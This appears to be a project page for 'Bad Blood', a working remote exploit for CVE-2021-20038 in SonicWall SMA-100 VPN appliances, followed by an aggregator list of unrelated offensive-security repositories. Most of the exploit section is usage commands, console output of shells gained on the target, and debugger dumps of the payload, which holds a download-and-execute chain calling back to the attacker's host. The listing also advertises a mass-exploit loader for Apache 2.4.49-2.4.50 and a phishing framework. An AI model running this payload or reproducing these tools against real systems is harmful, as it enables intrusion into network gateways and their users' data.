SonicWall SMA-100 Unauth RCE Exploit (CVE-2021-20038)

Related tags

Security related resourcesexploitrcecve-2021-20038
Overview

Bad Blood

Bad Blood is an exploit for CVE-2021-20038, a stack-based buffer overflow in the httpd binary of SMA-100 series systems using firmware versions 10.2.1.x. I've written a lot of the technical details here:

The exploit, as written, will open up a telnet bind shell on port 1270. An attacker that connects to the shell will achieve execution as nobody.

Example Output

[email protected]:~/badblood$ date
Mon Jan 10 01:15:12 PM PST 2022
[email protected]:~/badblood$ python3 badblood.py --rhost 10.0.0.7 --lhost 10.0.0.3 --rversion 10.2.1.2-24sv

▄▄▄▄    ▄▄▄      ▓█████▄     ▄▄▄▄    ██▓     ▒█████   ▒█████  ▓█████▄     
▓█████▄ ▒████▄    ▒██▀ ██▌   ▓█████▄ ▓██▒    ▒██▒  ██▒▒██▒  ██▒▒██▀ ██▌  
▒██▒ ▄██▒██  ▀█▄  ░██   █▌   ▒██▒ ▄██▒██░    ▒██░  ██▒▒██░  ██▒░██   █▌
▒██░█▀  ░██▄▄▄▄██ ░▓█▄   ▌   ▒██░█▀  ▒██░    ▒██   ██░▒██   ██░░▓█▄   ▌ 
░▓█  ▀█▓ ▓█   ▓██▒░▒████▓    ░▓█  ▀█▓░██████▒░ ████▓▒░░ ████▓▒░░▒████▓ 
░▒▓███▀▒ ▒▒   ▓▒█░ ▒▒▓  ▒    ░▒▓███▀▒░ ▒░▓  ░░ ▒░▒░▒░ ░ ▒░▒░▒░  ▒▒▓  ▒ 
▒░▒   ░   ▒   ▒▒ ░ ░ ▒  ▒    ▒░▒   ░ ░ ░ ▒  ░  ░ ▒ ▒░   ░ ▒ ▒░  ░ ▒  ▒  
 ░    ░   ░   ▒    ░ ░  ░     ░    ░   ░ ░   ░ ░ ░ ▒  ░ ░ ░ ▒   ░ ░  ░  
 ░            ░  ░   ░        ░          ░  ░    ░ ░      ░ ░     ░     
      ░            ░               ░                            ░       

[+] Spinning up HTTP server
[+] User did not provide an address. We'll guess it.
[+] Generated 2047 base addresses
[+] Generated 1046017 total addresses to search
[+] Filtering addresses for double visits (thanks awesome payload!)
[+] Filtered down to 235533 total addresses to search
[+] Crashing all forks to reset stack to a semi-predicatable state
[+] Crashing complete. Good job. Let's go do work.
[+] Disabling stderr
[+] Spawning 4 workers
[+] Attempting to exploit the remote server. This might take quite some time. :eek:
[%] Addresses Tested: 70%
[*] Received an HTTP callback from 10.0.0.7 at 10/Jan/2022 14:38:03
[*] Now we got bad blood. Hey! 🦞
[email protected]:~/badblood$ telnet 10.0.0.7 1270
Trying 10.0.0.7...
Connected to 10.0.0.7.
Escape character is '^]'.

bash-4.2$ whoami
nobody
bash-4.2$ uname -a
Linux sslvpn 3.13.3 #1 SMP Tue Oct 12 09:52:15 GMT 2021 i686 i686 i386 GNU/Linux
bash-4.2$

Supported Versions

Version Supported Tested Tested Target
10.2.1.2-24sv Yes ✔️ SMA 500v ESX
10.2.1.1-19sv Yes ✔️ SMA 500v ESX
10.2.1.0-17sv Yes ✔️ SMA 500v ESX

Usage

At minimum, you'll need to provide:

  • rhost: the remote host's IP address
  • lhost: the local host's IP address
  • version: the version of the target.

Please read the stability notes for addtional context.

An obvious question, is how to obtain the target's version? A simple curl request to the target will reveal that they use the version number for css and js versioning.

"> 
[email protected]:~$ curl --insecure https://10.0.0.7/cgi-bin/welcome
...

The Metasploit module for CVE-2021-20039 parses this, but I didn't have it in me to do it for this exploit. Note that if you are scanning your environment for these things, I believe the "Server: SonicWall SSL-VPN Web Server" is the most reliable. About 22k in Jan. 2022.

Help Output

[email protected]:~/badblood$ python3 badblood.py --help

▄▄▄▄    ▄▄▄      ▓█████▄     ▄▄▄▄    ██▓     ▒█████   ▒█████  ▓█████▄     
▓█████▄ ▒████▄    ▒██▀ ██▌   ▓█████▄ ▓██▒    ▒██▒  ██▒▒██▒  ██▒▒██▀ ██▌  
▒██▒ ▄██▒██  ▀█▄  ░██   █▌   ▒██▒ ▄██▒██░    ▒██░  ██▒▒██░  ██▒░██   █▌
▒██░█▀  ░██▄▄▄▄██ ░▓█▄   ▌   ▒██░█▀  ▒██░    ▒██   ██░▒██   ██░░▓█▄   ▌ 
░▓█  ▀█▓ ▓█   ▓██▒░▒████▓    ░▓█  ▀█▓░██████▒░ ████▓▒░░ ████▓▒░░▒████▓ 
░▒▓███▀▒ ▒▒   ▓▒█░ ▒▒▓  ▒    ░▒▓███▀▒░ ▒░▓  ░░ ▒░▒░▒░ ░ ▒░▒░▒░  ▒▒▓  ▒ 
▒░▒   ░   ▒   ▒▒ ░ ░ ▒  ▒    ▒░▒   ░ ░ ░ ▒  ░  ░ ▒ ▒░   ░ ▒ ▒░  ░ ▒  ▒  
 ░    ░   ░   ▒    ░ ░  ░     ░    ░   ░ ░   ░ ░ ░ ▒  ░ ░ ░ ▒   ░ ░  ░  
 ░            ░  ░   ░        ░          ░  ░    ░ ░      ░ ░     ░     
      ░            ░               ░                            ░       

usage: badblood.py [-h] --rhost RHOST [--rport RPORT] --lhost LHOST [--rversion RVERSION] [--rhostname RHOSTNAME] [--supported-versions] [--workers WORKERS] [--nocrash] [--enable-stderr] [--addr ADDR]
                   [--top-addr TOP_ADDR]

SonicWall SMA-100 Series Stack-Buffer Overflow Exploit (CVE-2021-20038)

optional arguments:
  -h, --help            show this help message and exit
  --supported-versions  The list of supported SMA-100 versions
  --workers WORKERS     The number of workers to spew the exploit
  --nocrash             Stops the exploit from sending a series of crash payload to start
  --enable-stderr       Enable stderr for debugging
  --addr ADDR           Test only. If you know the crash address, go wild.
  --top-addr TOP_ADDR   Test only. If you know the stack's top address, go wild.

required arguments:
  --rhost RHOST         The IPv4 address to connect to
  --rport RPORT         The port to connect to
  --lhost LHOST         The address to connect back to
  --rversion RVERSION   The version of the remote target
  --rhostname RHOSTNAME
                        The hostname of the remote target target

--addr vs. --top-addr vs. no option

There are three main modes of operation. The first is the exptected mode (address guessing). The second two are mostly for testing purposes.

I don't know any addresses!

This is the default state and no problem! We'll just guess a lot.

I know the address of the top of the stack!

Great! If you can cat maps or do some other magic:

bfa29000-bfa4a000 rw-p 00000000 00:00 0          [stack]

You can use the --top_addr parameter and reduce attack time down to a few seconds!

[email protected]:~/badblood$ date
Mon Jan 10 05:42:19 PM PST 2022
[email protected]:~/badblood$ python3 badblood.py --rhost 10.0.0.7 --lhost 10.0.0.3 --rversion 10.2.1.2-24sv --top-addr 3215237120

▄▄▄▄    ▄▄▄      ▓█████▄     ▄▄▄▄    ██▓     ▒█████   ▒█████  ▓█████▄     
▓█████▄ ▒████▄    ▒██▀ ██▌   ▓█████▄ ▓██▒    ▒██▒  ██▒▒██▒  ██▒▒██▀ ██▌  
▒██▒ ▄██▒██  ▀█▄  ░██   █▌   ▒██▒ ▄██▒██░    ▒██░  ██▒▒██░  ██▒░██   █▌
▒██░█▀  ░██▄▄▄▄██ ░▓█▄   ▌   ▒██░█▀  ▒██░    ▒██   ██░▒██   ██░░▓█▄   ▌ 
░▓█  ▀█▓ ▓█   ▓██▒░▒████▓    ░▓█  ▀█▓░██████▒░ ████▓▒░░ ████▓▒░░▒████▓ 
░▒▓███▀▒ ▒▒   ▓▒█░ ▒▒▓  ▒    ░▒▓███▀▒░ ▒░▓  ░░ ▒░▒░▒░ ░ ▒░▒░▒░  ▒▒▓  ▒ 
▒░▒   ░   ▒   ▒▒ ░ ░ ▒  ▒    ▒░▒   ░ ░ ░ ▒  ░  ░ ▒ ▒░   ░ ▒ ▒░  ░ ▒  ▒  
 ░    ░   ░   ▒    ░ ░  ░     ░    ░   ░ ░   ░ ░ ░ ▒  ░ ░ ░ ▒   ░ ░  ░  
 ░            ░  ░   ░        ░          ░  ░    ░ ░      ░ ░     ░     
      ░            ░               ░                            ░       

[+] Spinning up HTTP server
[+] User provided the top stack address: bfa4a000
[+] Generated 511 total addresses to search
[+] Filtering addresses for double visits (thanks awesome payload!)
[+] Filtered down to 243 total addresses to search
[+] Crashing all forks to reset stack to a semi-predicatable state
[+] Crashing complete. Good job. Let's go do work.
[+] Disabling stderr
[+] Spawning 4 workers
[+] Attempting to exploit the remote server. This might take quite some time. :eek:
[%] Addresses Tested: 33%
[*] Received an HTTP callback from 10.0.0.7 at 10/Jan/2022 17:42:34
[*] Now we got bad blood. Hey! 🦞
[email protected]:~/badblood$ telnet 10.0.0.7 1270
Trying 10.0.0.7...
Connected to 10.0.0.7.
Escape character is '^]'.

bash-4.2$ whoami
nobody
bash-4.2$

I know the exact address of $ebp+8

My man. Use --addr.

[email protected]:~/badblood$ date
Mon Jan 10 05:48:58 PM PST 2022
[email protected]:~/badblood$ python3 badblood.py --rhost 10.0.0.7 --lhost 10.0.0.3 --rversion 10.2.1.2-24sv --addr 3215229520

▄▄▄▄    ▄▄▄      ▓█████▄     ▄▄▄▄    ██▓     ▒█████   ▒█████  ▓█████▄     
▓█████▄ ▒████▄    ▒██▀ ██▌   ▓█████▄ ▓██▒    ▒██▒  ██▒▒██▒  ██▒▒██▀ ██▌  
▒██▒ ▄██▒██  ▀█▄  ░██   █▌   ▒██▒ ▄██▒██░    ▒██░  ██▒▒██░  ██▒░██   █▌
▒██░█▀  ░██▄▄▄▄██ ░▓█▄   ▌   ▒██░█▀  ▒██░    ▒██   ██░▒██   ██░░▓█▄   ▌ 
░▓█  ▀█▓ ▓█   ▓██▒░▒████▓    ░▓█  ▀█▓░██████▒░ ████▓▒░░ ████▓▒░░▒████▓ 
░▒▓███▀▒ ▒▒   ▓▒█░ ▒▒▓  ▒    ░▒▓███▀▒░ ▒░▓  ░░ ▒░▒░▒░ ░ ▒░▒░▒░  ▒▒▓  ▒ 
▒░▒   ░   ▒   ▒▒ ░ ░ ▒  ▒    ▒░▒   ░ ░ ░ ▒  ░  ░ ▒ ▒░   ░ ▒ ▒░  ░ ▒  ▒  
 ░    ░   ░   ▒    ░ ░  ░     ░    ░   ░ ░   ░ ░ ░ ▒  ░ ░ ░ ▒   ░ ░  ░  
 ░            ░  ░   ░        ░          ░  ░    ░ ░      ░ ░     ░     
      ░            ░               ░                            ░       

[+] Spinning up HTTP server
[+] User provided the crash address: bfa48250
[+] Filtering addresses for double visits (thanks awesome payload!)
[+] Filtered down to 1 total addresses to search
[+] Crashing all forks to reset stack to a semi-predicatable state
[+] Crashing complete. Good job. Let's go do work.
[+] Disabling stderr
[+] Spawning 4 workers
[+] Attempting to exploit the remote server. This might take quite some time. :eek:

[*] Received an HTTP callback from 10.0.0.7 at 10/Jan/2022 17:49:08
[*] Now we got bad blood. Hey! 🦞
[email protected]:~/badblood$ telnet 10.0.0.7 1270
Trying 10.0.0.7...
Connected to 10.0.0.7.
Escape character is '^]'.

bash-4.2$ whoami
nobody
bash-4.2$ uname -a
Linux sslvpn 3.13.3 #1 SMP Tue Oct 12 09:52:15 GMT 2021 i686 i686 i386 GNU/Linux
bash-4.2$

Stability

A good question for any exploit: How stable is this exploit? Not at all :lol: The buffer overflow occurs in a library called mod_cgi.so (a modified version of the Apache HTTP project). The library is loaded with a randomized base and the overflow requires a very specific memory layout to be successful (at least as I read it). Really not great for a remote attacker. But as I detailed in the AttackerKB entry, there is a variety of things that allow us to guess the random address we desire.

As such, this exploit, as written (I cannot emphasize enough that this can be improved), sends up to 235,335 HTTP requests in order to land the payload by guessing a stack address. Two hundred thousand requests doesn't sound bad but it can take some time. In the example I posted above, the exploit took 83 minutes to land. Which means you aren't rolling it into your Mirai botnet to spew all over the internet 🤷 I think it is a reasonable exploit for a targeted attack though.

Additionally, the exploit (as implemented) suffers from two issues that could cause exploitation to fail. The first one is sort of silly. There are two addresses in front of the shell command that eventually gets executed. Both those addresses get passed to /bin/sh because programming is hard. If the first address has a shell metacharacter like '(' or '`' then the exploit simply won't ever work. Sorry! The worst part is that you'll never really know if the remote target requires such an address or if the exploit is broken!

The second issue is much more specific to how I wrote this, and could easily be fixed by someone that cares. I wrote this exploit to make a call to system, because I'm lazy and a hack. That required the payload to remain less than 2500ish bytes otherwise you end up overwriting env[] and crashing failing. Anyways. As mentioned in the AKB entry, the overflow occurs due to the build up of an environment string build up. Alignment and whatnot are very important to this exploit. Here is an example of the payload in memory:

Breakpoint 1, 0xb697cfe6 in ?? () from /lib/mod_cgi.so
(gdb) disas 0xb697cfe6,0xb697cfea
Dump of assembler code from 0xb697cfe6 to 0xb697cfea:
=> 0xb697cfe6:  mov    0x8(%ebp),%eax
   0xb697cfe9:  mov    0x110(%eax),%eax
End of assembler dump.
(gdb) printf "%s", $ebp-982      
10.0.0.3 REDIRECT_QUERY_STRING=zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz REDIRECT_WAF_NOT_LICENSED=1REDIRECT_SCRIPT_URL=/$���8���8��;{curl,10.0.0.3:1270,-o,/tmp/a};{chmod,+x,/tmp/a};/tmp/a;aaaaaaa$���8���8��;{curl,10.0.0.3:1270,-o,/tmp/a};{chmod,+x,/tmp/a};/tmp/a;aaaaaaaREDIRECT_SCRIPT_URI=https://sslvpn/$���8���8��;{curl,10.0.0.3:1270,-o,/tmp/a};{chmod,+x,/tmp/a};/tmp/a;aaaaaaa$���8���8��;{curl,10.0.0.3:1270,-o,/tmp/a};{chmod,+x,/tmp/a};/tmp/a;aaaaaaaREDIRECT_HTTPS=onREDIRECT_REQUEST_METHOD=GETREDIRECT_STATUS=404WAF_NOT_LICENSED=1SCRIPT_URL=/$���8���8��;{curl,10.0.0.3:1270,-o,/tmp/a};{chmod,+x,/tmp/a};/tmp/a;aaaaaaa$���8���8��;{curl,10.0.0.3:1270,-o,/tmp/a};{chmod,+x,/tmp/a};/tmp/a;aaaaaaaSCRIPT_URI=https://sslvpn/$���8���8��;{curl,10.0.0.3:1270,-o,/tmp/a};{chmod,+x,/tmp/a};/tmp/a;aaaaaaa$���8���8��;{curl,10.0.0.3:1270,-o,/tmp/a};{chmod,+x,/tmp/a};/tmp/a;aaaaaaaHTTPS=onSERVER_SIGNATURE=SERVER_SOFTWARE=SonicWALL SSL-VPN Web ServerSERVER_NAME=sslvpnSERVER_ADDR=10.0.0.7SERVER_PORT=443REMOTE_ADDR=10.0.0.3DOCUMENT_ROOT=/usr/src/EasyAccess/www/htdocsREQUEST_SCHEME=httpsCONTEXT_PREFIX=CONTEXT_DOCUMENT_ROOT=/usr/src/EasyAccess/www/htdoc[email protected]_FILENAME=/usr/src/EasyAccess/www/cgi-bin/staticContentREMOTE_PORT=38236REDIRECT_URL=/$���8���8��;{curl,10.0.0.3:1270,-o,/tmp/a};{chmod,+x,/tmp/a};/tmp/a;aaaaaaa$���8���8��;{curl,10.0.0.3:1270,-o,/tmp/a};{chmod,+x,/tmp/a};/tmp/a;aaaaaaaGATEWAY_INTERFACE=CGI/1.1SERVER_PROTOCOL=HTTP/0.9REQUEST_METHOD=GETREQUEST_URI=/%24%87%a4%bf%38%88%a4%bf%38%88%a4%bf%08%b7%06%08;{curl,10.0.0.3:1270,-o,/tmp/a};{chmod,+x,/tmp/a};/tmp/a;aaaaaaa%24%87%a4%bf%38%88%a4%bf%38%88%a4%bf%08%b7%06%08;{curl,10.0.0.3:1270,-o,/tmp/a};{chmod,+x,/tmp/a};/tmp/a;aaaaaaa?zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzSCRIPT_NAME=/missing.html

And here is where it lands:

(gdb) printf "%s", $ebp+8        
$���8���8��;{curl,10.0.0.3:1270,-o,/tmp/a};{chmod,+x,/tmp/a};/tmp/a;aaaaaaa$���8���8��;{curl,10.0.0.3:1270,-o,/tmp/a};{chmod,+x,/tmp/a};/tmp/a;aaaaaaaSCRIPT_URI=https://sslvpn/$���8���8��;{curl,10.0.0.3:1270,-o,/tmp/a};{chmod,+x,/tmp/a};/tmp/a;aaaaaaa$���8���8��;{curl,10.0.0.3:1270,-o,/tmp/a};{chmod,+x,/tmp/a};/tmp/a;aaaaaaaHTTPS=onSERVER_SIGNATURE=SERVER_SOFTWARE=SonicWALL SSL-VPN Web ServerSERVER_NAME=sslvpnSERVER_ADDR=10.0.0.7SERVER_PORT=443REMOTE_ADDR=10.0.0.3DOCUMENT_ROOT=/usr/src/EasyAccess/www/htdocsREQUEST_SCHEME=httpsCONTEXT_PREFIX=CONTEXT_DOCUMENT_ROOT=/usr/src/EasyAccess/www/[email protected]_FILENAME=/usr/src/EasyAccess/www/cgi-bin/staticContentREMOTE_PORT=38236REDIRECT_URL=/$���8���8��;{curl,10.0.0.3:1270,-o,/tmp/a};{chmod,+x,/tmp/a};/tmp/a;aaaaaaa$���8���8��;{curl,10.0.0.3:1270,-o,/tmp/a};{chmod,+x,/tmp/a};/tmp/a;aaaaaaaGATEWAY_INTERFACE=CGI/1.1SERVER_PROTOCOL=HTTP/0.9REQUEST_METHOD=GETREQUEST_URI=/%24%87%a4%bf%38%88%a4%bf%38%88%a4%bf%08%b7%06%08;{curl,10.0.0.3:1270,-o,/tmp/a};{chmod,+x,/tmp/a};/tmp/a;aaaaaaa%24%87%a4%bf%38%88%a4%bf%38%88%a4%bf%08%b7%06%08;{curl,10.0.0.3:1270,-o,/tmp/a};{chmod,+x,/tmp/a};/tmp/a;aaaaaaa?zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzSCRIPT_NAME=/missing.html
(gdb) x/4x $ebp+8
0xbfa48250:     0xbfa48724      0xbfa48838      0xbfa48838      0x0806b708
(gdb)

Any unknown value between the beginning of the payload and the end will mess up alignment. Let's break it down a bit better:

10.0.0.3
REDIRECT_QUERY_STRING=zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz 
REDIRECT_WAF_NOT_LICENSED=1
REDIRECT_SCRIPT_URL=/$���8���8��;{curl,10.0.0.3:1270,-o,/tmp/a};{chmod,+x,/tmp/a};/tmp/a;aaaaaaa$���8���8��;{curl,10.0.0.3:1270,-o,/tmp/a};{chmod,+x,/tmp/a};/tmp/a;aaaaaaa
REDIRECT_SCRIPT_URI=https://sslvpn/$���8���8��;{curl,10.0.0.3:1270,-o,/tmp/a};{chmod,+x,/tmp/a};/tmp/a;aaaaaaa$���8���8��;{curl,10.0.0.3:1270,-o,/tmp/a};{chmod,+x,/tmp/a};/tmp/a;aaaaaaa
REDIRECT_HTTPS=on
REDIRECT_REQUEST_METHOD=GET
REDIRECT_STATUS=404
WAF_NOT_LICENSED=1
SCRIPT_URL=/

The obvious issues are:

  • IP address at the beginning
  • Hostname (sslvpn in the example)

Both are easily accounted for simply by modifying query string (z*400+). However, discovering the actual hostname (sslvpn is just the default) and the attacker's IP as it appears here might not always be as trivial. I'm actually not sure of the best way to determine the hostname... but just to prove non-default works:

[email protected]:~/badblood$ python3 badblood.py --rhost 10.0.0.7 --lhost 10.0.0.3 --rversion 10.2.1.2-24sv --top-addr 3218436096 --rhostname sslvpn1

▄▄▄▄    ▄▄▄      ▓█████▄     ▄▄▄▄    ██▓     ▒█████   ▒█████  ▓█████▄     
▓█████▄ ▒████▄    ▒██▀ ██▌   ▓█████▄ ▓██▒    ▒██▒  ██▒▒██▒  ██▒▒██▀ ██▌  
▒██▒ ▄██▒██  ▀█▄  ░██   █▌   ▒██▒ ▄██▒██░    ▒██░  ██▒▒██░  ██▒░██   █▌
▒██░█▀  ░██▄▄▄▄██ ░▓█▄   ▌   ▒██░█▀  ▒██░    ▒██   ██░▒██   ██░░▓█▄   ▌ 
░▓█  ▀█▓ ▓█   ▓██▒░▒████▓    ░▓█  ▀█▓░██████▒░ ████▓▒░░ ████▓▒░░▒████▓ 
░▒▓███▀▒ ▒▒   ▓▒█░ ▒▒▓  ▒    ░▒▓███▀▒░ ▒░▓  ░░ ▒░▒░▒░ ░ ▒░▒░▒░  ▒▒▓  ▒ 
▒░▒   ░   ▒   ▒▒ ░ ░ ▒  ▒    ▒░▒   ░ ░ ░ ▒  ░  ░ ▒ ▒░   ░ ▒ ▒░  ░ ▒  ▒  
 ░    ░   ░   ▒    ░ ░  ░     ░    ░   ░ ░   ░ ░ ░ ▒  ░ ░ ░ ▒   ░ ░  ░  
 ░            ░  ░   ░        ░          ░  ░    ░ ░      ░ ░     ░     
      ░            ░               ░                            ░       

[+] Spinning up HTTP server
[+] User provided the top stack address: bfd57000
[+] Generated 511 total addresses to search
[+] Filtering addresses for double visits (thanks awesome payload!)
[+] Filtered down to 243 total addresses to search
[+] Crashing all forks to reset stack to a semi-predicatable state
[+] Crashing complete. Good job. Let's go do work.
[+] Disabling stderr
[+] Spawning 4 workers
[+] Attempting to exploit the remote server. This might take quite some time. :eek:
[%] Addresses Tested: 9%
[*] Received an HTTP callback from 10.0.0.7 at 10/Jan/2022 18:31:45
[*] Now we got bad blood. Hey! 🦞
[email protected]:~/badblood$ telnet 10.0.0.7 1270
Trying 10.0.0.7...
Connected to 10.0.0.7.
Escape character is '^]'.

bash-4.2$ uname -a
Linux sslvpn1 3.13.3 #1 SMP Tue Oct 12 09:52:15 GMT 2021 i686 i686 i386 GNU/Linux
bash-4.2$

Testing

Do you want to hack on this? Great! I highly recommend rooting the device using the CVE-2021-20039 Metasploit module. Drop busybox on the device and start a root telnet shell. Drop gdb on the device and start debugging.

Credit

  • Taylor Swift
Owner
Jake Baines
Lead Security Researcher @ Rapid7
Jake Baines
GitHub Repository https://attackerkb.com/topics/QyXRC1wbvC/cve-2021-20038/rapid7-analysis
Threat research and reporting from IronNet's Threat Research Teams

IronNet Threat Research 🕵️ Overview This repository contains IronNet's Threat Research. Research & Reporting 📝 Project Description Cobalt Strike Res

36 Dec 02, 2022
CodeTest信息收集和漏洞利用工具

CodeTest信息收集和漏洞利用工具,可在进行渗透测试之时方便利用相关信息收集脚本进行信息的获取和验证工作,漏洞利用模块可选择需要测试的漏洞模块,或者选择所有模块测试,包含CVE-2020-14882, CVE-2020-2555等,可自己收集脚本后按照模板进行修改。

23 Mar 18, 2021
script that pulls cve collections from NVD.NIST.GOV.

# cvepull.py #script that pulls cve collections from NVD.NIST.GOV. #edit line 17 (timedelta) number to change the amount of days to search backwards

Aaron W 1 Dec 18, 2021
ThePhish: an automated phishing email analysis tool

ThePhish ThePhish is an automated phishing email analysis tool based on TheHive, Cortex and MISP. It is a web application written in Python 3 and base

675 Jan 03, 2023
Small python script to look for common vulnerabilities on SMTP server.

BrokenSMTP BrokenSMTP is a python3 BugBounty/Pentesting tool to look for common vulnerabilities on SMTP server. Supported Vulnerability : Spoofing - T

39 Dec 16, 2022
Hashpic - Hashpic creates an image from a MD5 or SHA512 hash

Hashpic Hashpic creates an image from the MD5 hash of your input. Since v0.2.0 i

0xflotus 15 Nov 23, 2022
Simplify getting and using cookies from the browser to use in Python.

CookieCache Simplify getting and using cookies from the browser to use in Python. NOTE: All the logic to interface with the browsers is done by the Br

pat_h/to/file 2 May 06, 2022
D-810 is an IDA Pro plugin which can be used to deobfuscate code at decompilation time by modifying IDA Pro microcode.

Introduction fork from https://gitlab.com/eshard/d810 What is D-810 D-810 is an IDA Pro plugin which can be used to deobfuscate code at decompilation

Banny 30 Dec 06, 2022
It's a simple tool for test vulnerability shellshock

Shellshock, also known as Bashdoor, is a family of security bugs in the Unix Bash shell, the first of which was disclosed on 24 September 2014. Shellshock could enable an attacker to cause Bash to ex

Mr. Cl0wn - H4ck1ng C0d3r 88 Dec 23, 2022
A wordlist generator tool, that allows you to supply a set of words, giving you the possibility to craft multiple variations from the given words, creating a unique and ideal wordlist to use regarding a specific target.

A wordlist generator tool, that allows you to supply a set of words, giving you the possibility to craft multiple variations from the given words, creating a unique and ideal wordlist to use regardin

Cycurity 39 Dec 10, 2022
On the 11/11/21 the apache 2.4.49-2.4.50 remote command execution POC has been published online and this is a loader so that you can mass exploit servers using this.

ApacheRCE ApacheRCE is a small little python script that will allow you to input the apache version 2.4.49-2.4.50 and then input a list of ip addresse

3 Dec 04, 2022
Simple and easy framework for phishing 🎣

👋 It's in beta, I'm still building How to install Linux and Termux: Clone Rp: git clone https://github.com/J4c5/superfish.git Install the dependencie

Jack 4 Jan 27, 2022
Example for the NFT 3D Collectibles using Blender Scripting (Python).

NFT Collectibles using Blender Python What is this? This project is to demonstrate for generating NFT Collectible Avatar-Styled images. For details, p

hideckies 48 Nov 26, 2022
Genpyteal - Experiment to rewrite Python into PyTeal using RedBaron

genpyteal Converts Python to PyTeal. Your mileage will vary depending on how muc

Jason Livesay 9 Oct 19, 2022
DepFine Is a tool to find the unregistered dependency based on dependency confusion valunerablility and lead to RCE

DepFine DepFine Is a tool to find the unregistered dependency based on dependency confusion valunerablility and lead to RCE Installation: You Can inst

Hossam mesbah 14 Nov 11, 2022
CVE-2021-43798Exp多线程批量验证脚本

Grafana V8.*任意文件读取Exp--多线程批量验证脚本 漏洞描述 Grafana是一个开源的度量分析与可视化套件。经常被用作基础设施的时间序列数据和应用程序分析的可视化,它在其他领域也被广泛的使用包括工业传感器、家庭自动化、天气和过程控制等。其 8.*版本任意文件读取漏洞,该漏洞目前为0d

2 Dec 16, 2021
Exploiting CVE-2021-44228 in Unifi Network Application for remote code execution and more

Log4jUnifi Exploiting CVE-2021-44228 in Unifi Network Application for remote cod

96 Jan 02, 2023
OLOP: One-Line & Obfuscated Python

OLOP: One-Line & Obfuscated Python This repository contains useful python modules for one-line and obfuscated python. pip install olop-ShadowLugia650

1 Jan 09, 2022
Uses Sharphound, Bloodhound and Neo4j to produce an actionable list of attack paths for targeted remediation.

GoodHound ______ ____ __ __ / ____/___ ____ ____/ / / / /___ __ ______ ____/ / / / __/ __ \/ __ \/ __

idna 352 Jan 02, 2023
Proof-of-concept obfuscation toolkit for C# post-exploitation tools

InvisibilityCloak Proof-of-concept obfuscation toolkit for C# post-exploitation tools. This will perform the below actions for a C# visual studio proj

259 Dec 19, 2022